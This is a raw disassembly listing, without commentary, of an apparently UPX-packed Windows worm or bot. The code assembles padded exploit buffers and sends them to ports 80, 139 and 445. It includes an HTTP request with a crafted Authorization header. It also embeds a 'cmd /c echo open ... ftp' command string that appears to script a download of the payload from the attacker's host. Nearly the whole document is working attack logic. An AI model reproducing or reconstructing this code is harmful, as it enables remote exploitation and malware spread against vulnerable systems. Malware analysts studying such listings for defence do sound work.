bp-based frame sub_40C8AB proc near ; CODE XREF: sub_40C9A5+18p ; sub_40CA1F+16p ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp mov eax, [ebp+arg_4] push ebx mov ebx, ecx push esi mov ecx, [ebp+arg_C] push edi lea edi, [eax+ecx] push edi call sub_41B4D5 mov esi, eax pop ecx test esi, esi jz short loc_40C8F7 push edi push 0 push esi call sub_41B590 push [ebp+arg_4] push [ebp+arg_0] push esi call sub_41C310 push [ebp+arg_C] mov eax, [ebp+arg_4] add eax, esi push [ebp+arg_8] push eax call sub_41C310 add esp, 24h mov [ebx+4], edi mov [ebx], esi loc_40C8F7: ; CODE XREF: sub_40C8AB+1Cj pop edi mov eax, ebx pop esi pop ebx pop ebp retn 10h sub_40C8AB endp ; =============== S U B R O U T I N E ======================================= sub_40C900 proc near ; CODE XREF: sub_40C9A5+5Ep ; sub_40C9A5+6Fp ... push esi mov esi, ecx mov eax, [esi] test eax, eax jz short loc_40C910 push eax call sub_41B0B1 pop ecx loc_40C910: ; CODE XREF: sub_40C900+7j and dword ptr [esi+4], 0 and dword ptr [esi], 0 pop esi retn sub_40C900 endp ; =============== S U B R O U T I N E ======================================= sub_40C919 proc near ; CODE XREF: sub_40C9A5+20p ; sub_40CA80+8p ... push ebx push esi mov esi, ecx push edi mov eax, [esi+4] cmp eax, 0FFFFh jge short loc_40C946 xor ebx, ebx cmp eax, 7Fh setnl bl dec ebx and ebx, 0FFFFFFFEh add ebx, 3 add eax, ebx push eax call sub_41B4D5 mov edi, eax pop ecx test edi, edi jnz short loc_40C94A loc_40C946: ; CODE XREF: sub_40C919+Dj xor al, al jmp short loc_40C9A1 ; --------------------------------------------------------------------------- loc_40C94A: ; CODE XREF: sub_40C919+2Bj mov eax, ebx add eax, [esi+4] push eax push 0 push edi call sub_41B590 add esp, 0Ch cmp ebx, 1 jnz short loc_40C96F mov al, [esi+4] mov [edi], al push dword ptr [esi+4] lea eax, [edi+1] push dword ptr [esi] jmp short loc_40C989 ; --------------------------------------------------------------------------- loc_40C96F: ; CODE XREF: sub_40C919+45j mov byte ptr [edi], 82h mov eax, [esi+4] sar eax, 8 mov [edi+1], al mov al, [esi+4] mov [edi+2], al push dword ptr [esi+4] lea eax, [edi+3] push dword ptr [esi] loc_40C989: ; CODE XREF: sub_40C919+54j push eax call sub_41C310 add esp, 0Ch push dword ptr [esi] call sub_41B0B1 add [esi+4], ebx pop ecx mov [esi], edi mov al, 1 loc_40C9A1: ; CODE XREF: sub_40C919+2Fj pop edi pop esi pop ebx retn sub_40C919 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40C9A5 proc near ; CODE XREF: sub_40CADB+89p ; sub_40CADB+E3p ... var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp push ecx push ecx push esi mov esi, ecx push edi lea ecx, [ebp+var_8] push dword ptr [esi+4] push dword ptr [esi] push 1 push offset dword_4CB50C call sub_40C8AB lea ecx, [ebp+var_8] call sub_40C919 mov eax, [ebp+var_4] inc eax push eax call sub_41B4D5 mov edi, eax pop ecx test edi, edi jnz short loc_40C9DF xor al, al jmp short loc_40CA1B ; --------------------------------------------------------------------------- loc_40C9DF: ; CODE XREF: sub_40C9A5+34j mov eax, [ebp+var_4] inc eax push eax push 0 push edi call sub_41B590 mov byte ptr [edi], 3 push [ebp+var_4] lea eax, [edi+1] push [ebp+var_8] push eax call sub_41C310 add esp, 18h mov ecx, esi call sub_40C900 mov eax, [ebp+var_4] lea ecx, [ebp+var_8] inc eax mov [esi], edi mov [esi+4], eax call sub_40C900 mov al, 1 loc_40CA1B: ; CODE XREF: sub_40C9A5+38j pop edi pop esi leave retn sub_40C9A5 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40CA1F proc near ; CODE XREF: sub_40CA53+14p ; sub_40CA70+8p ... var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp push ecx push ecx push esi mov esi, ecx push [ebp+arg_4] lea ecx, [ebp+var_8] push [ebp+arg_0] push dword ptr [esi+4] push dword ptr [esi] call sub_40C8AB mov ecx, esi call sub_40C900 mov eax, [ebp+var_8] mov [esi], eax mov eax, [ebp+var_4] mov [esi+4], eax mov al, 1 pop esi leave retn 8 sub_40CA1F endp ; =============== S U B R O U T I N E ======================================= sub_40CA53 proc near ; CODE XREF: sub_40CADB+F0p ; sub_40CADB+15Bp ... arg_0 = dword ptr 4 push esi mov esi, ecx push [esp+4+arg_0] call sub_41AFE0 pop ecx push eax mov ecx, esi push [esp+8+arg_0] call sub_40CA1F pop esi retn 4 sub_40CA53 endp ; =============== S U B R O U T I N E ======================================= sub_40CA70 proc near ; CODE XREF: sub_40CABC+Bp ; sub_40CADB+1A1p ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 push [esp+arg_4] push [esp+4+arg_0] call sub_40CA1F retn 8 sub_40CA70 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40CA80 proc near ; CODE XREF: sub_40CABC+16p ; sub_40CADB+91p ... var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp push ecx push ecx push esi mov esi, ecx call sub_40C919 test al, al jz short loc_40CAB9 push dword ptr [esi+4] lea ecx, [ebp+var_8] push dword ptr [esi] push 1 push offset dword_42CFE4 call sub_40C8AB mov ecx, esi call sub_40C900 mov eax, [ebp+var_8] mov [esi], eax mov eax, [ebp+var_4] mov [esi+4], eax mov al, 1 loc_40CAB9: ; CODE XREF: sub_40CA80+Fj pop esi leave retn sub_40CA80 endp ; =============== S U B R O U T I N E ======================================= sub_40CABC proc near ; CODE XREF: sub_40CADB+134p arg_0 = dword ptr 4 arg_4 = dword ptr 8 push esi mov esi, ecx push [esp+4+arg_4] push [esp+8+arg_0] call sub_40CA70 test al, al jz short loc_40CAD7 mov ecx, esi call sub_40CA80 loc_40CAD7: ; CODE XREF: sub_40CABC+12j pop esi retn 8 sub_40CABC endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40CADB proc near ; CODE XREF: UPX0:0040D362p var_858 = byte ptr -858h var_58 = dword ptr -58h var_54 = dword ptr -54h var_50 = dword ptr -50h var_4C = dword ptr -4Ch var_48 = dword ptr -48h var_44 = dword ptr -44h var_40 = dword ptr -40h var_3C = dword ptr -3Ch var_38 = dword ptr -38h var_34 = dword ptr -34h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp sub esp, 858h push ebx push edi lea ecx, [ebp+var_48] call sub_40C867 mov edi, 408h cmp [ebp+arg_8], edi jg loc_40CE2F mov ebx, [ebp+arg_10] lea eax, [ebx+8] cmp eax, edi ja loc_40CE2F push esi lea ecx, [ebp+var_30] call sub_40C867 lea ecx, [ebp+var_20] call sub_40C867 lea ecx, [ebp+var_50] call sub_40C867 lea ecx, [ebp+var_18] call sub_40C867 lea ecx, [ebp+var_40] call sub_40C867 lea ecx, [ebp+var_38] call sub_40C867 lea ecx, [ebp+var_28] call sub_40C867 push 4 push offset dword_432338 lea ecx, [ebp+var_30] call sub_40CA1F push 3 push offset dword_432340 lea ecx, [ebp+var_30] call sub_40CA1F lea ecx, [ebp+var_30] call sub_40C9A5 lea ecx, [ebp+var_30] call sub_40CA80 mov esi, 800h lea eax, [ebp+var_858] push esi push 42h push eax call sub_41B590 add esp, 0Ch lea ecx, [ebp+var_20] push 8 push offset aRbrbrbrb ; "BBBB" call sub_40CA1F push ebx lea ecx, [ebp+var_20] push [ebp+arg_C] call sub_40CA1F mov eax, 409h lea ecx, [ebp+var_20] sub eax, [ebp+var_1C] push eax lea eax, [ebp+var_858] push eax call sub_40CA1F lea ecx, [ebp+var_20] call sub_40C9A5 push offset loc_4326BC lea ecx, [ebp+var_50] call sub_40CA53 lea ecx, [ebp+var_50] call sub_40C9A5 push esi lea eax, [ebp+var_858] push 44h push eax call sub_41B590 add esp, 0Ch lea eax, [ebp+var_858] lea ecx, [ebp+var_58] push 410h push eax call sub_40C871 lea ecx, [ebp+var_58] call sub_40C9A5 push [ebp+var_54] lea ecx, [ebp+var_50] push [ebp+var_58] call sub_40CABC lea ecx, [ebp+var_58] call sub_40C900 push esi lea eax, [ebp+var_858] push 43h push eax call sub_41B590 add esp, 0Ch push offset aCccc ; "CCCC" lea ecx, [ebp+var_18] call sub_40CA53 push 4 push offset dword_432344 lea ecx, [ebp+var_18] call sub_40CA1F push [ebp+arg_8] lea ecx, [ebp+var_18] push [ebp+arg_4] call sub_40CA1F sub edi, [ebp+arg_8] lea eax, [ebp+var_858] lea ecx, [ebp+var_18] push edi push eax call sub_40CA1F lea ecx, [ebp+var_18] call sub_40C9A5 push [ebp+var_14] lea ecx, [ebp+var_40] push [ebp+var_18] call sub_40CA70 push [ebp+var_4C] lea ecx, [ebp+var_40] push [ebp+var_50] call sub_40CA70 lea ecx, [ebp+var_40] call sub_40CA80 lea ecx, [ebp+var_18] call sub_40C900 lea ecx, [ebp+var_50] call sub_40C900 push [ebp+var_1C] lea ecx, [ebp+var_38] push [ebp+var_20] call sub_40CA70 push [ebp+var_2C] lea ecx, [ebp+var_38] push [ebp+var_30] call sub_40CA70 push [ebp+var_3C] lea ecx, [ebp+var_38] push [ebp+var_40] call sub_40CA70 lea ecx, [ebp+var_38] call sub_40CA80 lea ecx, [ebp+var_20] call sub_40C900 lea ecx, [ebp+var_30] call sub_40C900 lea ecx, [ebp+var_40] call sub_40C900 push esi lea eax, [ebp+var_858] push 41h push eax call sub_41B590 add esp, 0Ch lea eax, [ebp+var_858] lea ecx, [ebp+var_28] push 400h push eax call sub_40CA1F lea ecx, [ebp+var_28] call sub_40C9A5 push 2 push offset dword_4326B0 lea ecx, [ebp+var_28] call sub_40CA1F push [ebp+var_34] lea ecx, [ebp+var_28] push [ebp+var_38] call sub_40CA70 lea ecx, [ebp+var_28] call sub_40CA80 lea ecx, [ebp+var_38] call sub_40C900 lea ecx, [ebp+var_10] call sub_40C867 lea ecx, [ebp+var_8] call sub_40C867 push [ebp+var_24] lea ecx, [ebp+var_10] push [ebp+var_28] call sub_40CA70 lea ecx, [ebp+var_10] call sub_40C919 lea ecx, [ebp+var_28] call sub_40C900 push offset dword_4326AC lea ecx, [ebp+var_8] call sub_40CA53 push [ebp+var_C] lea ecx, [ebp+var_8] push [ebp+var_10] call sub_40CA70 lea ecx, [ebp+var_8] call sub_40C919 lea ecx, [ebp+var_10] call sub_40C900 push offset dword_4326A8 lea ecx, [ebp+var_10] call sub_40CA53 push [ebp+var_4] lea ecx, [ebp+var_10] push [ebp+var_8] call sub_40CA70 lea ecx, [ebp+var_10] call sub_40C919 lea ecx, [ebp+var_8] call sub_40C900 push offset dword_43269C lea ecx, [ebp+var_8] call sub_40CA53 push [ebp+var_C] lea ecx, [ebp+var_8] push [ebp+var_10] call sub_40CA70 lea ecx, [ebp+var_8] call sub_40C919 lea ecx, [ebp+var_10] call sub_40C900 push (offset loc_432697+1) lea ecx, [ebp+var_48] call sub_40CA53 push [ebp+var_4] lea ecx, [ebp+var_48] push [ebp+var_8] call sub_40CA70 lea ecx, [ebp+var_8] call sub_40C900 mov eax, [ebp+arg_0] mov ecx, [ebp+var_48] pop esi mov [eax], ecx mov ecx, [ebp+var_44] mov [eax+4], ecx jmp short loc_40CE3D ; --------------------------------------------------------------------------- loc_40CE2F: ; CODE XREF: sub_40CADB+1Bj ; sub_40CADB+29j mov eax, [ebp+arg_0] mov ecx, [ebp+var_48] mov [eax], ecx mov ecx, [ebp+var_44] mov [eax+4], ecx loc_40CE3D: ; CODE XREF: sub_40CADB+352j pop edi pop ebx leave retn sub_40CADB endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40CE41 proc near ; CODE XREF: sub_40CF05+A1p ; sub_40CF05+C2p ... var_210 = dword ptr -210h var_20C = dword ptr -20Ch var_10C = dword ptr -10Ch var_108 = dword ptr -108h var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp sub esp, 210h push esi push edi mov esi, [ebp+arg_0] push 1 pop edi lea eax, [ebp+var_8] push eax lea eax, [ebp+var_210] and [ebp+var_4], 0 push eax lea eax, [ebp+var_10C] push 0 push eax lea eax, [esi+1] push eax mov [ebp+var_108], esi mov [ebp+var_10C], edi mov [ebp+var_20C], esi mov [ebp+var_210], edi mov [ebp+var_8], 0Ah call dword_427228 ; select cmp eax, edi jnz short loc_40CEA8 lea eax, [ebp+var_10C] push eax push esi call sub_426756 ; __WSAFDIsSet test eax, eax jnz short loc_40CEAC loc_40CEA8: ; CODE XREF: sub_40CE41+54j xor eax, eax jmp short loc_40CEBC ; --------------------------------------------------------------------------- loc_40CEAC: ; CODE XREF: sub_40CE41+65j push [ebp+arg_C] push [ebp+arg_8] push [ebp+arg_4] push esi call ds:dword_4CB66C ; recv loc_40CEBC: ; CODE XREF: sub_40CE41+69j pop edi pop esi leave retn sub_40CE41 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40CEC0 proc near ; CODE XREF: sub_40CF05+81p ; sub_40CF05+ABp var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp push ecx push [ebp+arg_8] call ds:dword_4CB650 ; htonl mov [ebp+var_4], eax push 0 lea eax, [ebp+var_4] push 4 push eax push [ebp+arg_0] call ds:dword_4CB6A4 ; send cmp eax, 4 jz short loc_40CEEA xor al, al leave retn ; --------------------------------------------------------------------------- loc_40CEEA: ; CODE XREF: sub_40CEC0+24j push 0 push [ebp+arg_8] push [ebp+arg_4] push [ebp+arg_0] call ds:dword_4CB6A4 ; send sub eax, [ebp+arg_8] neg eax sbb eax, eax inc eax leave retn sub_40CEC0 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40CF05 proc near ; CODE XREF: sub_40CFDF+48p ; UPX0:0040D453p var_104 = byte ptr -104h var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 104h push ebx push esi push edi mov edi, [ebp+arg_8] lea ebx, [edi+41h] push ebx mov [ebp+var_4], ebx call sub_41B4D5 mov esi, eax pop ecx test esi, esi jnz short loc_40CF2E xor al, al jmp loc_40CFDA ; --------------------------------------------------------------------------- loc_40CF2E: ; CODE XREF: sub_40CF05+20j push ebx push 0 push esi call sub_41B590 push 2Fh push offset dword_4323D4 push esi call sub_41C310 push 8 lea eax, [esi+31h] push offset dword_432404 push eax mov [esi+2Fh], di call sub_41C310 push edi lea ebx, [esi+3Bh] push [ebp+arg_4] mov [esi+39h], di push ebx call sub_41C310 push 6 add ebx, edi push offset dword_4CE36C push ebx call sub_41C310 mov ebx, [ebp+arg_0] push 85h push offset dword_43234C push ebx call sub_40CEC0 add esp, 48h test al, al jnz short loc_40CF96 loc_40CF92: ; CODE XREF: sub_40CF05+B5j xor bl, bl jmp short loc_40CFD1 ; --------------------------------------------------------------------------- loc_40CF96: ; CODE XREF: sub_40CF05+8Bj mov edi, 100h push 0 lea eax, [ebp+var_104] push edi push eax push ebx call sub_40CE41 push [ebp+var_4] push esi push ebx call sub_40CEC0 add esp, 1Ch test al, al jz short loc_40CF92 push 0 lea eax, [ebp+var_104] push edi push eax push ebx call sub_40CE41 add esp, 10h mov bl, 1 loc_40CFD1: ; CODE XREF: sub_40CF05+8Fj push esi call sub_41B0B1 pop ecx mov al, bl loc_40CFDA: ; CODE XREF: sub_40CF05+24j pop edi pop esi pop ebx leave retn sub_40CF05 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40CFDF proc near ; CODE XREF: UPX0:0040D439p var_20 = byte ptr -20h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 20h push 0 push 48h push offset unk_432410 push [ebp+arg_0] call dword_427224 ; send cmp eax, 48h jnz short loc_40D01A push 0 lea eax, [ebp+var_20] push 20h push eax push [ebp+arg_0] call sub_40CE41 add esp, 10h cmp eax, 0FFFFFFFFh jz short loc_40D01A cmp [ebp+var_20], 82h jz short loc_40D01E loc_40D01A: ; CODE XREF: sub_40CFDF+1Bj ; sub_40CFDF+33j xor al, al leave retn ; --------------------------------------------------------------------------- loc_40D01E: ; CODE XREF: sub_40CFDF+39j push [ebp+arg_8] push [ebp+arg_4] push [ebp+arg_0] call sub_40CF05 add esp, 0Ch leave retn sub_40CFDF endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40D031 proc near ; CODE XREF: sub_40D07D+2Dp var_10 = qword ptr -10h var_8 = qword ptr -8 arg_0 = dword ptr 8 push ebp mov ebp, esp push ecx push ecx mov eax, [ebp+arg_0] and dword ptr [ebp+var_8+4], 0 shl eax, 3 mov dword ptr [ebp+var_8], eax fild [ebp+var_8] fmul dbl_427688 call sub_41C798 and dword ptr [ebp+var_8+4], 0 mov dword ptr [ebp+var_8], eax fild [ebp+var_8] push ecx push ecx ; double fst [ebp+var_8] fmul dbl_427680 fstp [esp+10h+var_10] call sub_41C679 fadd st, st pop ecx pop ecx fadd [ebp+var_8] call sub_41C798 inc eax leave retn sub_40D031 endp ; =============== S U B R O U T I N E ======================================= sub_40D07D proc near ; CODE XREF: sub_40D21F+24p var_40 = qword ptr -40h mov eax, offset loc_426DF7 call sub_41CC64 sub esp, 2Ch mov al, [ebp+13h] push ebx push esi push edi xor edi, edi lea ecx, [ebp-38h] push edi mov [ebp-20h], edi mov [ebp-38h], al call sub_40D6B4 push 1 pop ebx push dword ptr [ebp+10h] mov [ebp-4], ebx call sub_40D031 cmp [ebp-2Ch], eax pop ecx jnb short loc_40D0BF push edi push eax lea ecx, [ebp-38h] call sub_40D62F loc_40D0BF: ; CODE XREF: sub_40D07D+36j cmp [ebp+10h], edi mov [ebp-18h], edi jbe loc_40D1DC mov ebx, [ebp+10h] loc_40D0CE: ; CODE XREF: sub_40D07D+156j cmp dword ptr [ebp+10h], 3 jb short loc_40D0D8 push 3 jmp short loc_40D0EA ; --------------------------------------------------------------------------- loc_40D0D8: ; CODE XREF: sub_40D07D+55j cmp dword ptr [ebp+10h], 2 jnz short loc_40D0E2 push 2 jmp short loc_40D0EA ; --------------------------------------------------------------------------- loc_40D0E2: ; CODE XREF: sub_40D07D+5Fj cmp dword ptr [ebp+10h], 1 jnz short loc_40D0EB push 1 loc_40D0EA: ; CODE XREF: sub_40D07D+59j ; sub_40D07D+63j pop ebx loc_40D0EB: ; CODE XREF: sub_40D07D+69j mov [ebp-28h], ebx mov [ebp-24h], edi fild qword ptr [ebp-28h] push ecx push ecx ; double fmul dbl_427698 fstp [esp+40h+var_40] call sub_41C7BF pop ecx pop ecx call sub_41C798 cmp ebx, edi mov [ebp-1Ch], eax jbe short loc_40D12A mov esi, [ebp+0Ch] mov ecx, ebx mov edx, ecx lea edi, [ebp-10h] shr ecx, 2 rep movsd mov ecx, edx and ecx, 3 rep movsb xor edi, edi loc_40D12A: ; CODE XREF: sub_40D07D+93j mov cl, [ebp-10h] mov dl, [ebp-10h] sar cl, 2 and cl, 3Fh and dl, 3 mov [ebp-14h], cl mov cl, [ebp-0Fh] sar cl, 4 and cl, 0Fh add [ebp+0Ch], ebx shl dl, 4 add cl, dl mov dl, [ebp-0Fh] mov [ebp-13h], cl mov cl, [ebp-0Eh] sar cl, 6 and dl, 0Fh sub [ebp+10h], ebx and cl, 3 xor esi, esi shl dl, 2 add cl, dl mov [ebp-12h], cl mov cl, [ebp-0Eh] and cl, 3Fh cmp eax, edi mov [ebp-11h], cl jbe short loc_40D198 add [ebp-18h], eax loc_40D17C: ; CODE XREF: sub_40D07D+119j movsx eax, byte ptr [ebp+esi-14h] lea ecx, [ebp-38h] mov al, byte_43245C[eax] push eax push 1 call sub_40D4B1 inc esi cmp esi, [ebp-1Ch] jb short loc_40D17C loc_40D198: ; CODE XREF: sub_40D07D+FAj cmp dword ptr [ebp-18h], 48h jb short loc_40D1B6 push dword ptr [ebp+14h] call sub_41AFE0 pop ecx push eax lea ecx, [ebp-38h] push dword ptr [ebp+14h] call sub_40D50A mov [ebp-18h], edi loc_40D1B6: ; CODE XREF: sub_40D07D+11Fj push 4 pop esi cmp [ebp-1Ch], esi jnb short loc_40D1D0 sub esi, [ebp-1Ch] loc_40D1C1: ; CODE XREF: sub_40D07D+151j push 3Dh push 1 lea ecx, [ebp-38h] call sub_40D4B1 dec esi jnz short loc_40D1C1 loc_40D1D0: ; CODE XREF: sub_40D07D+13Fj cmp [ebp+10h], edi ja loc_40D0CE push 1 pop ebx loc_40D1DC: ; CODE XREF: sub_40D07D+48j mov esi, [ebp+8] mov al, [ebp-38h] push edi mov ecx, esi mov [esi], al call sub_40D6B4 push dword_427690 lea eax, [ebp-38h] mov ecx, esi push edi push eax call sub_40D561 mov [ebp-20h], ebx and byte ptr [ebp-4], 0 push ebx lea ecx, [ebp-38h] call sub_40D6B4 mov ecx, [ebp-0Ch] mov eax, esi pop edi pop esi pop ebx mov large fs:0, ecx leave retn sub_40D07D endp ; =============== S U B R O U T I N E ======================================= sub_40D21F proc near ; CODE XREF: UPX0:0040D41Cp mov eax, offset loc_426E14 call sub_41CC64 sub esp, 10h push ebx push esi push edi push offset byte_43D808 lea eax, [ebp-1Ch] push dword ptr [ebp+10h] xor ebx, ebx mov [ebp-4], ebx push dword ptr [ebp+0Ch] push eax call sub_40D07D mov eax, [ebp+1Ch] mov ecx, [ebp-14h] mov byte ptr [ebp-4], 1 lea esi, [ecx+eax+36h] push esi call sub_41B4D5 mov edi, eax add esp, 14h cmp edi, ebx jnz short loc_40D269 xor bl, bl jmp short loc_40D2AD ; --------------------------------------------------------------------------- loc_40D269: ; CODE XREF: sub_40D21F+44j mov ecx, [ebp-18h] mov eax, offset dword_4276A0 cmp ecx, ebx jnz short loc_40D277 mov ecx, eax loc_40D277: ; CODE XREF: sub_40D21F+54j cmp [ebp+18h], ebx jz short loc_40D27F mov eax, [ebp+18h] loc_40D27F: ; CODE XREF: sub_40D21F+5Bj push ecx push eax push offset aGetHttp1_0Host ; "GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"... push esi push edi call sub_41B980 add esp, 14h push ebx push esi push edi push dword ptr [ebp+8] call ds:dword_4CB6A4 ; send cmp eax, esi jz short loc_40D2A4 xor bl, bl jmp short loc_40D2A6 ; --------------------------------------------------------------------------- loc_40D2A4: ; CODE XREF: sub_40D21F+7Fj mov bl, 1 loc_40D2A6: ; CODE XREF: sub_40D21F+83j push edi call sub_41B0B1 pop ecx loc_40D2AD: ; CODE XREF: sub_40D21F+48j and byte ptr [ebp-4], 0 push 1 lea ecx, [ebp-1Ch] call sub_40D6B4 or dword ptr [ebp-4], 0FFFFFFFFh push 1 lea ecx, [ebp+14h] call sub_40D6B4 mov ecx, [ebp-0Ch] pop edi mov al, bl pop esi pop ebx mov large fs:0, ecx leave retn sub_40D21F endp ; --------------------------------------------------------------------------- push ebp mov ebp, esp sub esp, 420h and byte ptr [ebp-420h], 0 push ebx push esi push edi mov ecx, 0FFh xor eax, eax lea edi, [ebp-41Fh] push 8Fh rep stosd stosw stosb lea eax, [ebp-420h] push offset sub_432608 push eax call sub_41C310 add esp, 0Ch mov eax, offset byte_429110 push eax push eax movzx eax, word ptr ds:dword_4CB390 push eax push dword ptr [ebp+8] call sub_40AC10 pop ecx push eax push offset aCmdCEchoOpenSD ; "cmd /c echo open %s %d > o&echo user 1 "... lea eax, [ebp-391h] push 400h push eax call sub_41B980 add eax, 90h push eax lea eax, [ebp-420h] push eax push 164h lea eax, [ebp-8] push offset sub_4324A0 push eax call sub_40CADB xor esi, esi add esp, 30h cmp [ebp-4], esi jnz short loc_40D378 xor eax, eax jmp loc_40D4A4 ; --------------------------------------------------------------------------- loc_40D378: ; CODE XREF: UPX0:0040D36Fj mov [ebp-0Ch], esi loc_40D37B: ; CODE XREF: UPX0:0040D47Bj test esi, esi jnz loc_40D481 push 6 push 1 push 2 call dword_427220 ; socket mov ebx, eax cmp ebx, 0FFFFFFFFh jz loc_40D469 xor eax, eax lea edi, [ebp-1Ah] stosd push dword ptr [ebp+0A8h] stosd stosd stosw mov word ptr [ebp-1Ch], 2 call ds:dword_4CB654 ; htons mov [ebp-1Ah], ax lea eax, [ebp+0Ch] push eax call ds:dword_4CB694 ; inet_addr mov [ebp-18h], eax lea eax, [ebp-1Ch] push 10h push eax push ebx call ds:dword_4CB5FC ; connect cmp eax, 0FFFFFFFFh jz loc_40D45E cmp dword ptr [ebp+0A8h], 50h jnz short loc_40D426 mov al, [ebp+0C3h] sub esp, 10h mov esi, esp mov [ebp-20h], esp push 0 mov ecx, esi mov [esi], al call sub_40D6B4 lea eax, [ebp+0Ch] push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+0Ch] push eax mov ecx, esi call sub_40D6F0 push dword ptr [ebp-4] push dword ptr [ebp-8] push ebx call sub_40D21F add esp, 1Ch jmp short loc_40D45B ; --------------------------------------------------------------------------- loc_40D426: ; CODE XREF: UPX0:0040D3E4j cmp dword ptr [ebp+0A8h], 8Bh jnz short loc_40D440 push dword ptr [ebp-4] push dword ptr [ebp-8] push ebx call sub_40CFDF jmp short loc_40D458 ; --------------------------------------------------------------------------- loc_40D440: ; CODE XREF: UPX0:0040D430j cmp dword ptr [ebp+0A8h], 1BDh jnz short loc_40D45E push dword ptr [ebp-4] push dword ptr [ebp-8] push ebx call sub_40CF05 loc_40D458: ; CODE XREF: UPX0:0040D43Ej add esp, 0Ch loc_40D45B: ; CODE XREF: UPX0:0040D424j movzx esi, al loc_40D45E: ; CODE XREF: UPX0:0040D3D7j ; UPX0:0040D44Aj push ebx call ds:dword_4CB6EC ; closesocket test esi, esi jnz short loc_40D474 loc_40D469: ; CODE XREF: UPX0:0040D394j push 3E8h call dword_427078 ; Sleep loc_40D474: ; CODE XREF: UPX0:0040D467j inc dword ptr [ebp-0Ch] cmp dword ptr [ebp-0Ch], 2 jl loc_40D37B loc_40D481: ; CODE XREF: UPX0:0040D37Dj lea ecx, [ebp-8] call sub_40C900 test esi, esi jz short loc_40D4A2 mov eax, [ebp+0B0h] shl eax, 6 inc dword_431B08[eax] lea eax, dword_431B08[eax] loc_40D4A2: ; CODE XREF: UPX0:0040D48Bj mov eax, esi loc_40D4A4: ; CODE XREF: UPX0:0040D373j pop edi pop esi pop ebx leave retn ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_426DD8 loc_40D4A9: ; CODE XREF: sub_426DD8+3j ; UPX0:00426DF1j ... push 1 call sub_40D6B4 retn ; END OF FUNCTION CHUNK FOR sub_426DD8 ; =============== S U B R O U T I N E ======================================= sub_40D4B1 proc near ; CODE XREF: sub_40D07D+110p ; sub_40D07D+14Bp arg_0 = dword ptr 4 arg_4 = byte ptr 8 mov eax, dword_427690 push ebx mov ebx, [esp+4+arg_0] push esi mov esi, ecx push edi sub eax, [esi+8] cmp eax, ebx ja short loc_40D4CB call sub_42669A loc_40D4CB: ; CODE XREF: sub_40D4B1+13j test ebx, ebx jbe short loc_40D502 mov edi, ebx push 0 add edi, [esi+8] mov ecx, esi push edi call sub_40D62F test al, al jz short loc_40D502 movsx eax, [esp+0Ch+arg_4] push ebx push eax mov eax, [esi+4] add eax, [esi+8] push eax call sub_41B590 mov eax, [esi+4] add esp, 0Ch mov [esi+8], edi and byte ptr [eax+edi], 0 loc_40D502: ; CODE XREF: sub_40D4B1+1Cj ; sub_40D4B1+2Fj mov eax, esi pop edi pop esi pop ebx retn 8 sub_40D4B1 endp ; =============== S U B R O U T I N E ======================================= sub_40D50A proc near ; CODE XREF: sub_40D07D+131p arg_0 = dword ptr 4 arg_4 = dword ptr 8 mov eax, dword_427690 push ebx mov ebx, [esp+4+arg_4] push esi mov esi, ecx push edi sub eax, [esi+8] cmp eax, ebx ja short loc_40D524 call sub_42669A loc_40D524: ; CODE XREF: sub_40D50A+13j test ebx, ebx jbe short loc_40D559 mov edi, ebx push 0 add edi, [esi+8] mov ecx, esi push edi call sub_40D62F test al, al jz short loc_40D559 mov eax, [esi+8] push ebx push [esp+10h+arg_0] add eax, [esi+4] push eax call sub_41C310 mov eax, [esi+4] add esp, 0Ch mov [esi+8], edi and byte ptr [edi+eax], 0 loc_40D559: ; CODE XREF: sub_40D50A+1Cj ; sub_40D50A+2Fj mov eax, esi pop edi pop esi pop ebx retn 8 sub_40D50A endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40D561 proc near ; CODE XREF: sub_40D07D+17Cp ; sub_4265B0+15p arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp mov eax, [ebp+arg_4] push ebx mov ebx, [ebp+arg_0] push esi push edi mov edi, ecx cmp [ebx+8], eax jnb short loc_40D579 call sub_426573 loc_40D579: ; CODE XREF: sub_40D561+11j mov eax, [ebx+8] mov ecx, [ebp+arg_4] mov esi, eax sub esi, ecx cmp [ebp+arg_8], esi jnb short loc_40D58B mov esi, [ebp+arg_8] 